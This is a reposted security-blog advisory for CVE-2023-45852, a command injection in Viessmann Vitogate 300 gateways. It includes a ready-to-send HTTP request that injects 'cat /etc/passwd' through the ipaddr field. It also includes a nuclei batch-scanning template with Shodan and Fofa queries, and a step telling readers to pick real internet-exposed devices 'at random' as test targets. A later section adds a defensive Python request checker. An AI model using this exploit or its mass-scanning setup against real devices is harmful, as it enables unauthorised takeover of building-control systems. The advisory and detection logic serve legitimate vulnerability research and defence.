Viessmann Vitogate Remote Code Execution Vulnerability (CVE-2023-45852)

admin, 2023-11-06 11:45:18


Vulnerability overview


Viessmann Vitogate is an intelligent building-control gateway made by Viessmann.


Viessmann Vitogate 300 version 2.1.3.0 contains a security vulnerability: an unauthenticated attacker can bypass authentication and execute arbitrary operating-system commands through the ipaddr parameter of the put method, because the value is passed to a shell without being validated.



Affected versions



Viessmann Vitogate_300_Firmware <= 2.1.3.0, Viessmann Vitogate_300


Reproduction



Step 1: Search Fofa with the following syntax and pick a target for the test at random....

# Search syntax: title="Vitogate 300"

Step 2: Enable the proxy, open BP (Burp Suite) and intercept the request for the home page.... Then modify the request contents as follows.

POST /cgi-bin/vitogate.cgi HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: langCookie=en
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 91

{"method":"put","form":"form-4-8","session":"","params":{"ipaddr":"1;cat /etc/passwd"}}


Batch script (nuclei template)



id: CVE-2023-45852

info:
  name: Viessmann Vitogate 300 - Remote Code Execution
  author: Dreamkoi
  severity: critical
  description: |
    In Vitogate 300 2.1.3.0, /cgi-bin/vitogate.cgi allows an unauthenticated attacker to bypass authentication and execute arbitrary commands via shell metacharacters in the ipaddr params JSON data for the put method.
  reference:
    - https://connectivity.viessmann.com/gb/mp-fp/vitogate/vitogate-300-bn-mb.html
    - https://github.com/Push3AX/vul/blob/main/viessmann/Vitogate300_RCE.md
    - https://nvd.nist.gov/vuln/detail/CVE-2023-45852
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-45852
    cwe-id: CWE-77
    epss-score: 0.1097
    epss-percentile: 0.94493
    cpe: cpe:2.3:o:viessmann:vitogate_300_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: viessmann
    product: vitogate_300_firmware
    shodan-query: title:"Vitogate 300"
    fofa-query: title="Vitogate 300"
  tags: cve,cve2023,rce,vitogate

http:
  - raw:
      - |
        POST /cgi-bin/vitogate.cgi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"method":"put","form":"form-4-8","session":"","params":{"ipaddr":"{{randstr}};cat /etc/passwd"}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(header, "application/json")'
          - 'contains_all(body, "traceroute: {{randstr}}: Unknown host", "daemon:x:1:1:")'
        condition: and
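A defensive counterpart to the request in step 2 and the template above, added here as an example that is not part of the original post or of the vendor's firmware: a small Python checker that a reverse proxy, WAF or IDS in front of the gateway could apply to JSON bodies sent to /cgi-bin/vitogate.cgi. It flags an ipaddr value that is anything other than an IP literal or an RFC 1123 hostname (the allow-list check the CGI itself should enforce) and, as a second signal taken from the PoC, a put with an empty session token. The function names and the two sample bodies are constructed for this example.

```python
import ipaddress
import json
import re

# Characters that never belong in an IP-address field but let a value break
# out of a shell command string (the CWE-77 pattern behind CVE-2023-45852).
SHELL_META = re.compile(r'[;&|`$(){}<>\\\'"\s]')

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens.
HOSTNAME_RE = re.compile(
    r'^(?=.{1,253}$)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?'
    r'(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$')


def is_valid_target(value: str) -> bool:
    """Allow-list check: an IPv4/IPv6 literal or an RFC 1123 hostname."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return bool(HOSTNAME_RE.match(value))


def inspect_vitogate_body(body: str) -> dict:
    """Classify one JSON body sent to /cgi-bin/vitogate.cgi (constructed helper)."""
    try:
        doc = json.loads(body)
    except ValueError:
        return {"suspicious": False, "indicators": [], "ipaddr": None}
    if not isinstance(doc, dict) or doc.get("method") != "put":
        return {"suspicious": False, "indicators": [], "ipaddr": None}
    params = doc.get("params")
    ipaddr = params.get("ipaddr") if isinstance(params, dict) else None
    indicators = []
    if ipaddr is not None and not isinstance(ipaddr, str):
        indicators.append("ipaddr is not a string")
    elif ipaddr is not None and SHELL_META.search(ipaddr):
        indicators.append("shell metacharacters in ipaddr")
    elif ipaddr is not None and not is_valid_target(ipaddr):
        indicators.append("ipaddr is not an IP address or hostname")
    # The PoC writes configuration with an empty session token: a second signal.
    if doc.get("session") == "":
        indicators.append("put with empty session")
    return {"suspicious": bool(indicators), "indicators": indicators,
            "ipaddr": ipaddr if isinstance(ipaddr, str) else None}


# Constructed sample bodies: a legitimate update and the PoC's payload shape.
BENIGN_BODY = '{"method":"put","form":"form-4-8","session":"s3ss10n","params":{"ipaddr":"192.168.1.10"}}'
MALICIOUS_BODY = '{"method":"put","form":"form-4-8","session":"","params":{"ipaddr":"1;cat /etc/passwd"}}'
```

Running inspect_vitogate_body over the two sample bodies returns no indicators for the benign update and both indicators for the PoC shape; the same allow-list check, applied inside the CGI before the value reaches a shell, is the fix rather than the detection.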

The techniques, ideas and tools described in articles published or reposted by 揽月安全团队 are provided solely for learning and exchange for security purposes. No one may use them for illegal purposes or for profit; anyone who does so bears the consequences themselves!!!!!









Originally published on the WeChat public account 揽月安全团队: Viessmann Vitogate Remote Code Execution Vulnerability (CVE-2023-45852)

When reposting, please keep this link (CN-SEC中文网, with thanks to the original author): Viessmann Vitogate Remote Code Execution Vulnerability (CVE-2023-45852) http://cn-sec.com/archives/2179601.html
